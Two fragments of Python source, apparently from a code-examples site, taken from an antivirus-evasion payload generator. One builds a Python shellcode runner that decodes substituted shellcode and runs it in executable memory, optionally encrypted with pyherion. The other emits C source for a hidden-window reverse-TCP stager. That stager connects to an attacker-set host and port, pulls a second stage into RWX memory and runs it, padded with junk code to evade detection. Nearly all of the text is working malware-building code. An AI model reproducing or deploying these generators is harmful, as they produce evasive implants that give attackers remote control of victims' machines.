			payload_code += rand_decoded_letter + ' = "%s"\n' % decode_with_this
			payload_code += rand_correct_letter + ' = "%s"\n' % encode_with_this
			payload_code += rand_sub_scheme + ' = maketrans('+ rand_decoded_letter +', '+ rand_correct_letter + ')\n'
			payload_code += subbed_shellcode_variable_name + ' = \"'+ Shellcode.translate(sub_scheme) +'\"\n'
			payload_code += subbed_shellcode_variable_name + ' = ' + subbed_shellcode_variable_name + '.translate(' + rand_sub_scheme + ')\n'
			payload_code += shellcode_variable_name + ' = bytearray(' + subbed_shellcode_variable_name + '.decode(\"string_escape\"))\n'
			payload_code += rand_ptr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(' + shellcode_variable_name + ')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n'
			payload_code += rand_buf + ' = (ctypes.c_char * len(' + shellcode_variable_name + ')).from_buffer(' + shellcode_variable_name + ')\n'
			payload_code += 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + rand_ptr + '),' + rand_buf + ',ctypes.c_int(len(' + shellcode_variable_name + ')))\n'
			payload_code += rand_ht + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + rand_ptr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n'
			payload_code += 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + rand_ht + '),ctypes.c_int(-1))\n'

			if self.required_options["use_pyherion"][0].lower() == "y":
				payload_code = crypters.pyherion(payload_code)
			
			return payload_code

		else:
			
			#Additional random variable names
			rand_reverse_shell = randomizer.randomString()
			rand_memory_shell = randomizer.randomString()
			rand_shellcode = randomizer.randomString()

			# Create Payload File
			payload_code = 'from ctypes import *\n'
			payload_code += 'from string import maketrans\n'
			payload_code += rand_decoded_letter + ' = "%s"\n' % decode_with_this
			payload_code += rand_correct_letter + ' = "%s"\n' % encode_with_this
			payload_code += rand_sub_scheme + ' = maketrans('+ rand_decoded_letter +', '+ rand_correct_letter + ')\n'
			payload_code += subbed_shellcode_variable_name + ' = \"'+ Shellcode.translate(sub_scheme) +'\"\n'
			payload_code += subbed_shellcode_variable_name + ' = ' + subbed_shellcode_variable_name + '.translate(' + rand_sub_scheme + ')\n'
			payload_code += subbed_shellcode_variable_name + ' = ' + subbed_shellcode_variable_name + '.decode(\"string_escape\")\n'
			payload_code += rand_memory_shell + ' = create_string_buffer(' + subbed_shellcode_variable_name + ', len(' + subbed_shellcode_variable_name + '))\n'
			payload_code += rand_shellcode + ' = cast(' + rand_memory_shell + ', CFUNCTYPE(c_void_p))\n'
			payload_code += rand_shellcode + '()'
    
			if self.required_options["use_pyherion"][0].lower() == "y":
				payload_code = crypters.pyherion(payload_code)

			return payload_code
Example #31
0
    def generate(self):

        winsock_init_name = randomizer.randomString()
        punt_name = randomizer.randomString()
        recv_all_name = randomizer.randomString()
        wsconnect_name = randomizer.randomString()

        # the real includes needed
        includes = [
            "#include <stdio.h>", "#include <stdlib.h>",
            "#include <windows.h>", "#include <string.h>"
        ]

        # max length string for obfuscation
        global_max_string_length = 10000
        max_string_length = random.randint(1, global_max_string_length)
        max_num_strings = 10000

        # TODO: add in more string processing functions
        randName1 = randomizer.randomString()  # reverse()
        randName2 = randomizer.randomString()  # doubles characters
        stringModFunctions = [
            (randName1,
             "char* %s(const char *t) { int length= strlen(t); int i; char* t2 = (char*)malloc((length+1) * sizeof(char)); for(i=0;i<length;i++) { t2[(length-1)-i]=t[i]; } t2[length] = '\\0'; return t2; }"
             % (randName1)),
            (randName2,
             "char* %s(char* s){ char *result =  malloc(strlen(s)*2+1); int i; for (i=0; i<strlen(s)*2+1; i++){ result[i] = s[i/2]; result[i+1]=s[i/2];} result[i] = '\\0'; return result; }"
             % (randName2))
        ]

        random.shuffle(stringModFunctions)

        # obfuscation "logical nop" string generation functions
        randString1 = randomizer.randomString(50)
        randName1 = randomizer.randomString()
        randVar1 = randomizer.randomString()
        randName2 = randomizer.randomString()
        randVar2 = randomizer.randomString()
        randVar3 = randomizer.randomString()
        randName3 = randomizer.randomString()
        randVar4 = randomizer.randomString()
        randVar5 = randomizer.randomString()

        stringGenFunctions = [
            (randName1,
             "char* %s(){ char *%s = %s(\"%s\"); return strstr( %s, \"%s\" );}"
             % (randName1, randVar1, stringModFunctions[0][0], randString1,
                randVar1, randString1[len(randString1) / 2])),
            (randName2,
             "char* %s(){ char %s[%s/2], %s[%s/2]; strcpy(%s,\"%s\"); strcpy(%s,\"%s\"); return %s(strcat( %s, %s)); }"
             % (randName2, randVar2, max_string_length, randVar3,
                max_string_length, randVar2, randomizer.randomString(50),
                randVar3, randomizer.randomString(50),
                stringModFunctions[1][0], randVar2, randVar3)),
            (randName3,
             "char* %s() { char %s[%s] = \"%s\"; char *%s = strupr(%s); return strlwr(%s); }"
             % (randName3, randVar4, max_string_length,
                randomizer.randomString(50), randVar5, randVar4, randVar5))
        ]
        random.shuffle(stringGenFunctions)

        # obfuscation - add in our fake includes
        fake_includes = [
            "#include <sys/timeb.h>", "#include <time.h>", "#include <math.h>",
            "#include <signal.h>", "#include <stdarg.h>",
            "#include <limits.h>", "#include <assert.h>"
        ]
        t = random.randint(1, 7)
        for x in xrange(1, random.randint(1, 7)):
            includes.append(fake_includes[x])

        # shuffle up real/fake includes
        random.shuffle(includes)

        code = "#define _WIN32_WINNT 0x0500\n"
        code += "#include <winsock2.h>\n"
        code += "\n".join(includes) + "\n"

        #string mod functions
        code += stringModFunctions[0][1] + "\n"
        code += stringModFunctions[1][1] + "\n"

        # build the winsock_init function
        wVersionRequested_name = randomizer.randomString()
        wsaData_name = randomizer.randomString()
        code += "void %s() {" % (winsock_init_name)
        code += "WORD %s = MAKEWORD(%s, %s); WSADATA %s;" % (
            wVersionRequested_name, helpers.obfuscateNum(
                2, 4), helpers.obfuscateNum(2, 4), wsaData_name)
        code += "if (WSAStartup(%s, &%s) < 0) { WSACleanup(); exit(1);}}\n" % (
            wVersionRequested_name, wsaData_name)

        # first logical nop string function
        code += stringGenFunctions[0][1] + "\n"

        # build punt function
        my_socket_name = randomizer.randomString()
        code += "void %s(SOCKET %s) {" % (punt_name, my_socket_name)
        code += "closesocket(%s);" % (my_socket_name)
        code += "WSACleanup();"
        code += "exit(1);}\n"

        # second logical nop string function
        code += stringGenFunctions[1][1] + "\n"

        # build recv_all function
        my_socket_name = randomizer.randomString()
        buffer_name = randomizer.randomString()
        len_name = randomizer.randomString()
        code += "int %s(SOCKET %s, void * %s, int %s){" % (
            recv_all_name, my_socket_name, buffer_name, len_name)
        code += "int slfkmklsDSA=0;int rcAmwSVM=0;"
        code += "void * startb = %s;" % (buffer_name)
        code += "while (rcAmwSVM < %s) {" % (len_name)
        code += "slfkmklsDSA = recv(%s, (char *)startb, %s - rcAmwSVM, 0);" % (
            my_socket_name, len_name)
        code += "startb += slfkmklsDSA; rcAmwSVM   += slfkmklsDSA;"
        code += "if (slfkmklsDSA == SOCKET_ERROR) %s(%s);} return rcAmwSVM; }\n" % (
            punt_name, my_socket_name)

        # third logical nop string function
        code += stringGenFunctions[2][1] + "\n"

        # build wsconnect function
        target_name = randomizer.randomString()
        sock_name = randomizer.randomString()
        my_socket_name = randomizer.randomString()
        code += "SOCKET %s() { struct hostent * %s; struct sockaddr_in %s; SOCKET %s;" % (
            wsconnect_name, target_name, sock_name, my_socket_name)
        code += "%s = socket(AF_INET, SOCK_STREAM, 0);" % (my_socket_name)
        code += "if (%s == INVALID_SOCKET) %s(%s);" % (
            my_socket_name, punt_name, my_socket_name)
        code += "%s = gethostbyname(\"%s\");" % (
            target_name, self.required_options["LHOST"][0])
        code += "if (%s == NULL) %s(%s);" % (target_name, punt_name,
                                             my_socket_name)
        code += "memcpy(&%s.sin_addr.s_addr, %s->h_addr, %s->h_length);" % (
            sock_name, target_name, target_name)
        code += "%s.sin_family = AF_INET;" % (sock_name)
        code += "%s.sin_port = htons(%s);" % (
            sock_name,
            helpers.obfuscateNum(int(self.required_options["LPORT"][0]), 32))
        code += "if ( connect(%s, (struct sockaddr *)&%s, sizeof(%s)) ) %s(%s);" % (
            my_socket_name, sock_name, sock_name, punt_name, my_socket_name)
        code += "return %s;}\n" % (my_socket_name)

        # build main() code
        size_name = randomizer.randomString()
        buffer_name = randomizer.randomString()
        function_name = randomizer.randomString()
        my_socket_name = randomizer.randomString()
        count_name = randomizer.randomString()

        # obfuscation stuff
        char_array_name_1 = randomizer.randomString()
        number_of_strings_1 = random.randint(1, max_num_strings)
        char_array_name_2 = randomizer.randomString()
        number_of_strings_2 = random.randint(1, max_num_strings)
        char_array_name_3 = randomizer.randomString()
        number_of_strings_3 = random.randint(1, max_num_strings)

        code += "int main(int argc, char * argv[]) {"
        code += "ShowWindow( GetConsoleWindow(), SW_HIDE );"
        code += "ULONG32 %s;" % (size_name)
        code += "char * %s;" % (buffer_name)
        code += "int i;"
        code += "char* %s[%s];" % (char_array_name_1, number_of_strings_1)
        code += "void (*%s)();" % (function_name)

        # malloc our first string obfuscation array
        code += "for (i = 0;  i < %s;  ++i) %s[i] = malloc (%s);" % (
            number_of_strings_1, char_array_name_1,
            random.randint(max_string_length, global_max_string_length))

        code += "%s();" % (winsock_init_name)
        code += "char* %s[%s];" % (char_array_name_2, number_of_strings_2)
        code += "SOCKET %s = %s();" % (my_socket_name, wsconnect_name)

        # malloc our second string obfuscation array
        code += "for (i = 0;  i < %s;  ++i) %s[i] = malloc (%s);" % (
            number_of_strings_2, char_array_name_2,
            random.randint(max_string_length, global_max_string_length))

        code += "int %s = recv(%s, (char *)&%s, %s, 0);" % (
            count_name, my_socket_name, size_name, helpers.obfuscateNum(4, 2))
        code += "if (%s != %s || %s <= 0) %s(%s);" % (
            count_name, helpers.obfuscateNum(
                4, 2), size_name, punt_name, my_socket_name)

        code += "%s = VirtualAlloc(0, %s + %s, MEM_COMMIT, PAGE_EXECUTE_READWRITE);" % (
            buffer_name, size_name, helpers.obfuscateNum(5, 2))
        code += "char* %s[%s];" % (char_array_name_3, number_of_strings_3)

        # first string obfuscation method
        code += "for (i=0; i<%s; ++i){strcpy(%s[i], %s());}" % (
            number_of_strings_1, char_array_name_1, stringGenFunctions[0][0])

        # real code
        code += "if (%s == NULL) %s(%s);" % (buffer_name, punt_name,
                                             my_socket_name)
        code += "%s[0] = 0xBF;" % (buffer_name)
        code += "memcpy(%s + 1, &%s, %s);" % (buffer_name, my_socket_name,
                                              helpers.obfuscateNum(4, 2))

        # malloc our third string obfuscation array
        code += "for (i = 0;  i < %s;  ++i) %s[i] = malloc (%s);" % (
            number_of_strings_3, char_array_name_3,
            random.randint(max_string_length, global_max_string_length))

        # second string obfuscation method
        code += "for (i=0; i<%s; ++i){strcpy(%s[i], %s());}" % (
            number_of_strings_2, char_array_name_2, stringGenFunctions[1][0])

        # real code
        code += "%s = %s(%s, %s + %s, %s);" % (
            count_name, recv_all_name, my_socket_name, buffer_name,
            helpers.obfuscateNum(5, 2), size_name)
        code += "%s = (void (*)())%s;" % (function_name, buffer_name)
        code += "%s();" % (function_name)

        # third string obfuscation method (never called)
        code += "for (i=0; i<%s; ++i){strcpy(%s[i], %s());}" % (
            number_of_strings_3, char_array_name_3, stringGenFunctions[2][0])

        code += "return 0;}\n"

        return code